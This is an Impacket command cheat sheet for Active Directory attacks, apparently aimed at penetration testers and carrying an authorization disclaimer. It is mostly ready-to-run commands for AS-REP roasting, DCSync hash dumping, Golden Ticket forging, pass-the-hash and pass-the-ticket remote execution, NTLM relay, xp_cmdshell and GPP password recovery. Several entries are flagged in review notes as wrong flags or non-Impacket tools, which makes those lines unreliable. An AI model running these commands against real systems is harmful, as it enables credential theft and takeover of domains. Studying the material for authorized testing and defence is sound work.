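# Impacket quick reference for Active Directory assessments.
# Every command here requires explicit authorization for the target domain.
# Passwords passed on the command line end up in shell history and in the process
# list (`ps`); omit the password (impacket prompts for it) or authenticate with
# -hashes / -k where the script supports it.
# Flags vary between impacket releases -- confirm with `<script>.py -h` before use.

# Enumerate users in the Active Directory domain (authenticated LDAP query)
GetADUsers.py -all -dc-ip 10.0.0.1 your-domain.local/your-user:your-password
# AS-REP Roasting: request AS-REPs for accounts that do not require Kerberos
# pre-authentication. No credentials are needed with -usersfile; the output is in
# john format (use -format hashcat for hashcat).
GetNPUsers.py your-domain.local/ -usersfile users.txt -outputfile hashes.txt -dc-ip 10.0.0.1 -format john
# DCSync: dump NTDS.DIT secrets through DRSUAPI replication. The target must be a
# domain controller and the account needs replication rights (e.g. Domain Admin or
# DS-Replication-Get-Changes[-All]). This is not an SMB hash dump: without -just-dc,
# secretsdump pulls SAM / LSA secrets / cached credentials from a member host via
# the remote registry instead.
secretsdump.py -just-dc your-domain.local/your-user:your-password@10.0.0.2
# Same DCSync, restricted to NTLM hashes (skips Kerberos keys and history).
# This does not touch LSASS; LSASS dumping is a different technique/tool.
secretsdump.py -just-dc-ntlm your-domain.local/your-user:your-password@10.0.0.2
# Remote execution via WMI (semi-interactive shell; output read back over an SMB share)
wmiexec.py your-domain.local/your-user:your-password@10.0.0.3
# Remote execution via SMB: creates a service per command, no binary is uploaded
smbexec.py your-domain.local/your-user:your-password@10.0.0.4
# Remote execution via Task Scheduler: the task runs as SYSTEM and its output is
# collected from ADMIN$, so give it a command with output rather than a bare cmd.exe
atexec.py your-domain.local/your-user:your-password@10.0.0.5 whoami
# Remote execution via DCOM (default object is ShellWindows; -object selects another)
dcomexec.py your-domain.local/your-user:your-password@10.0.0.6 whoami
# Enumerate shares and permissions over SMB (smbmap is a separate tool, not impacket)
smbmap.py -u your-user -p your-password -d your-domain.local -H 10.0.0.7
# Group Policy Preferences: the cpassword attribute in SYSVOL XML is encrypted with a
# publicly documented AES key, so any domain user who can read SYSVOL recovers the
# plaintext. NOTE(review): gpprefdecrypt.py as commonly distributed takes the
# cpassword string as its only argument; the flags below do not match that tool --
# verify. Impacket ships Get-GPPPassword.py, which searches SYSVOL and decrypts.
gpprefdecrypt.py -s your-domain.local -u your-user -p your-password -d your-domain.local
# Same, pointed at a SYSVOL share directly (see the note above about the flags)
gpprefdecrypt.py -s smb://10.0.0.8/sysvol -u your-user -p your-password -d your-domain.local
# Forge a Kerberos ticket (ticketer.py does not enumerate tickets). With the krbtgt
# account's NT hash this is a Golden Ticket (TGT) for `your-user`; with a service
# account's hash add -spn for a Silver Ticket. Writes your-user.ccache to the
# current directory.
ticketer.py -nthash krbtgt-nt-hash -domain-sid your-domain-sid -domain your-domain.local your-user
# Pass-the-hash over SMB. The LM half may be left empty (":nthash"). psexec uploads
# a service binary and creates a service -- noisy; prefer wmiexec/smbexec when quiet.
psexec.py -hashes lmhash:nthash your-domain.local/your-user@10.0.0.9 cmd.exe
# Pass-the-ticket: point KRB5CCNAME at the ccache (e.g. from ticketer.py) and address
# the target by hostname, not IP -- the ticket is bound to a service principal name
# (cifs/host.fqdn) and Kerberos auth against a bare IP fails. -dc-ip names the KDC.
export KRB5CCNAME=/path/to/your-user.ccache
wmiexec.py -k -no-pass -dc-ip 10.0.0.1 your-domain.local/your-user@target-host.your-domain.local cmd.exe

# SMB and SQL specific
# Host an SMB share on port 445 (needs root). Shares served by smbserver.py are NOT
# read-only: clients can write into /path/to/folder, so share a dedicated directory.
# -smb2support is required for modern Windows clients that have SMB1 disabled.
smbserver.py -smb2support -username your-user -password your-password SHARE_NAME /path/to/folder
# Same, bound to a specific interface and non-standard port, with a share comment
smbserver.py -smb2support -ip 10.0.0.1 -port 8445 -username your-user -password your-password -comment 'Writable Share' SHARE_NAME /path/to/folder
# Connect to SQL Server using Windows (domain) authentication
mssqlclient.py -windows-auth your-domain.local/your-user:your-password@10.0.0.2
# Connect to SQL Server using SQL Server authentication, selecting a database
mssqlclient.py -db your-database your-user:your-password@10.0.0.3
# xp_cmdshell: enabling it and running commands are commands typed at the SQL>
# prompt after connecting (impacket shell commands, not CLI flags); the login needs
# sysadmin. Use -file to run a script non-interactively instead of the prompt.
mssqlclient.py your-domain.local/your-user:your-password@10.0.0.4
#   SQL> enable_xp_cmdshell
#   SQL> xp_cmdshell ipconfig
# NTLM relay from the built-in SMB listener to an SMB target. Inbound auth has to be
# coerced or poisoned (if Responder runs alongside, disable its SMB/HTTP servers so
# ntlmrelayx owns the ports). SMB relay only works against targets that do not
# require SMB signing (domain controllers require it by default) -- scan for signing
# first. NOTE(review): -smbserver is not a documented ntlmrelayx.py option; verify with -h.
ntlmrelayx.py -t smb://10.0.0.6 -smb2support -smbserver your-smb-server
# Relay to LDAP (e.g. account/ACL abuse). Fails where LDAP signing or channel binding
# is enforced, and only HTTP-originated auth can be relayed to LDAP with signing negotiated.
ntlmrelayx.py -t ldap://10.0.0.7 -smb2support -smbserver your-smb-server
# Enumerate MSSQL instances via the SQL Server Browser service (UDP 1434).
# NOTE(review): mssqlinstance.py is not part of impacket -- verify the tool and flags.
mssqlinstance.py -ip 10.0.0.8
# Test an MSSQL connection with a given username and password (Windows auth)
mssqlclient.py -db your-database -windows-auth your-domain.local/your-user:your-password@10.0.0.9

# Top 10 quick reference (internal AD assessment; these are rarely in bug-bounty scope)
# 1. Enumerate users in the Active Directory domain
GetADUsers.py -all -dc-ip 10.0.0.1 your-domain.local/your-user:your-password
# 2. AS-REP Roasting: accounts without Kerberos pre-authentication
GetNPUsers.py your-domain.local/ -usersfile users.txt -outputfile hashes.txt -dc-ip 10.0.0.1 -format john
# 3. DCSync the domain's hashes from a DC (needs replication rights; look for weak or reused passwords)
secretsdump.py -just-dc your-domain.local/your-user:your-password@10.0.0.2
# 4. Enumerate shares and permissions over SMB (identify misconfigured shares)
smbmap.py -u your-user -p your-password -d your-domain.local -H 10.0.0.3
# 5. Group Policy Preferences in SYSVOL (look for cpassword values; see the flag note above)
gpprefdecrypt.py -s your-domain.local -u your-user -p your-password -d your-domain.local
# 6. Forge a Golden Ticket with the krbtgt NT hash (ticketer.py forges, it does not enumerate)
ticketer.py -nthash krbtgt-nt-hash -domain-sid your-domain-sid -domain your-domain.local your-user
# 7. Pass-the-hash over SMB and execute a command (lateral movement / escalation)
psexec.py -hashes lmhash:nthash your-domain.local/your-user@10.0.0.4 cmd.exe
# 8. Connect to SQL Server (identify misconfigurations such as xp_cmdshell or linked servers)
mssqlclient.py -db your-database your-user:your-password@10.0.0.5
# 9. NTLM relay to an SMB target (only works where SMB signing is not required)
ntlmrelayx.py -t smb://10.0.0.6 -smb2support -smbserver your-smb-server
# 10. Test an MSSQL login with given credentials (identify weak or reused credentials)
mssqlclient.py -db your-database -windows-auth your-domain.local/your-user:your-password@10.0.0.7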